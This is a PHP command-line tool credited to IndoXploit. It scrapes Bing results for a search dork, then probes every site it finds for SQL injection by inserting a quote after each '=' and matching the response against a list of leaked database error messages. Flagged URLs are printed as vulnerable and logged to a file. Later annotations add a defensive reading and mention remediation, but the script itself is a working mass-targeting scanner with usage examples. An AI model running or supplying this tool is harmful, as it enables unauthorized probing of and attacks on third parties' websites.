1 | <?php | |
2 | // SQL Scanner via Bing Dorker | |
3 | // Coded by Mr. Error 404 ( l0c4lh34rtz) - IndoXploit | |
4 | // Greetz: Sanjungan Jiwa - Jancok Sec - Res7ock Crew | |
5 | // usage: php sql.php 'bing_dorker' | |
6 | // ex: php sql.php '"page.php?id=1" site:it' | |
7 | ||
// Runtime setup. Taken together these make the script run silently and
// without a time bound: every PHP diagnostic is hidden (error_reporting(0)
// plus the @ operators) and the execution-time limit is removed.
error_reporting(0);
set_time_limit(0);
@header('Content-Type: text/html; charset=UTF-8');
@ini_set('memory_limit', '64M');
12 | ||
/**
 * Write the start-up banner (title, credits, usage line, example) to stdout.
 *
 * Takes no arguments and returns nothing; the last row ends with a blank line.
 */
function cover() {
    $rows = [
        " ****** SQL Scanner via Bing Dorker ******\n",
        " ***** Coded by l0c4lh34rtz - IndoXploit *****\n",
        " **** Sanjungan Jiwa - Jancok Sec - Res7ock Crew ****\n",
        " *** usage: php sql.php 'bing_dork' ***\n",
        " ** ex: php sql.php '\"page.php?id=1\" site:it' **\n\n",
    ];
    foreach ($rows as $row) {
        echo $row;
    }
}
// Response substrings that inject() treats as a sign that a request broke a
// query or raised a PHP warning. inject() joins them with "|" into a single
// case-insensitive pattern.
//
// Defensive reading: every entry is a verbose database or interpreter
// diagnostic that a production site has no reason to send to a client.
// Turning off error display and returning generic error pages removes the
// signal this list keys on; it does not repair the underlying query, which
// still needs bound parameters. The same list is usable as a check against
// one's own HTTP responses.
$error = [
    // Database engine / driver messages
    'You have an error in your SQL',
    'supplied argument is not a valid MySQL result resource in',
    'Division by zero in',
    'Call to a member function',
    'Microsoft JET Database',
    'ODBC Microsoft Access Driver',
    'Microsoft OLE DB Provider for SQL Server',
    'Unclosed quotation mark',
    'Microsoft OLE DB Provider for Oracle',
    'Incorrect syntax near',
    'SQL query failed',
    // PHP warnings leaked into the page body
    'Warning: filesize()',
    'Warning: preg_match()',
    'Warning: array_merge()',
    'Warning: mysql_query()',
    'Warning: mysql_num_rows()',
    'Warning: session_start()',
    'Warning: getimagesize()',
    'Warning: mysql_fetch_array()',
    'Warning: mysql_fetch_assoc()',
    'Warning: is_writable()',
    'Warning: Unknown()',
    'Warning: mysql_result()',
    'Warning: pg_exec()',
    'Warning: require()',
];
45 | ||
/**
 * Fetch a URL with cURL and return the response body.
 *
 * CURLOPT_RETURNTRANSFER is the only option set, so no timeout, User-Agent,
 * redirect or cookie behaviour is configured here and libcurl's defaults
 * apply. Requests sent this way typically arrive without a User-Agent
 * header, which is one attribute server logs can be filtered on.
 *
 * @param string $url Address to request.
 * @return string|false Response body, or false when curl_exec() fails.
 */
function getsource($url) {
    $handle = curl_init($url);
    curl_setopt_array($handle, [
        CURLOPT_RETURNTRANSFER => 1, // return the body instead of printing it
    ]);
    $body = curl_exec($handle);
    curl_close($handle);

    return $body;
}
/**
 * Request a modified copy of $url and report whether the response contains
 * any string from the global $error list.
 *
 * The modification is textual: every "=" in the URL becomes "='". On the
 * receiving side this appears in access logs as a quote (literal or %27)
 * directly after each "=" of the query string.
 *
 * The $error entries are interpolated into the pattern without quoting, so
 * characters such as "(", ")" and "." keep their regex meaning and the match
 * is looser than the literal text. A hit is therefore a heuristic signal
 * based on leaked error output, not proof of an injectable parameter.
 *
 * @param string $url Candidate URL.
 * @return int|false Result of preg_match(): 1 on a hit, 0 on none, false on
 *                   a regex error.
 */
function inject($url) {
    $probeUrl = str_replace("=", "='", $url);
    $response = getsource($probeUrl);

    $alternation = implode("|", $GLOBALS['error']);
    $pattern = "#" . $alternation . "#i";

    return preg_match($pattern, $response);
}
/**
 * Append one line to result_sql.txt in the current working directory.
 *
 * The file is opened in "a+" mode, so it is created when missing and earlier
 * content is kept. For incident response, a result_sql.txt holding one URL
 * per line is the on-disk artifact this script leaves behind.
 *
 * @param string $isi Text to store; a newline is added after it.
 */
function simpen($isi) {
    $line = $isi . "\n";

    $handle = fopen("result_sql.txt", "a+");
    fwrite($handle, $line);
    fclose($handle);
}
63 | ||
// Driver. Takes one search query from the command line, pages through Bing
// results for it, then sends a single probe per distinct host and records
// the URLs that inject() flags.
//
// What a targeted site sees: one GET for the first of its URLs that appeared
// in the search results, with a quote inserted after every "=".

// URL-encode the query; this runs before the isset() check below.
$do = urlencode($argv[1]);

if (!isset($argv[1])) {
    echo "usage: php " . $argv[0] . " 'bing_dork'\n";
    echo "ex: php " . $argv[0] . " '\"page.php?id=1\" site:it'\n";
} else {
    cover();

    $offset = 1;          // value sent as Bing's "first" parameter
    $lastOffset = 30000;  // upper bound on that value
    $allLinks = [];
    $lll = [];            // assigned but never read

    // Phase 1: collect result links, ten per page. The search request goes
    // out over plain http.
    while ($offset <= $lastOffset) {
        $page = getsource("http://www.bing.com/search?q=" . $do . "&first=" . $offset);
        if (!$page) {
            break; // fetch failed or empty body
        }

        preg_match_all('#<h2><a href="(.*?)" h="ID#', $page, $anchors);
        foreach ($anchors[1] as $href) {
            $allLinks[] = $href;
        }

        $offset += 10;
        // Stop once the page holds no reference to the next offset.
        if (preg_match("(first=" . $offset . "&)siU", $page, $nextRef) == 0) {
            break;
        }
    }

    // Phase 2: probe each host once. $_SESSION is used only as an in-memory
    // "already seen" map keyed by "http://<host>/"; no session is started.
    foreach ($allLinks as $url) {
        $hostKey = "http://" . parse_url($url, PHP_URL_HOST) . "/";

        if ($_SESSION[$hostKey]) {
            continue; // this host was already handled
        }
        $_SESSION[$hostKey] = "1";

        if (inject($url)) {
            echo " $url -> Vuln!!\n";
            simpen($url);
        }
    }
}
97 | ?> |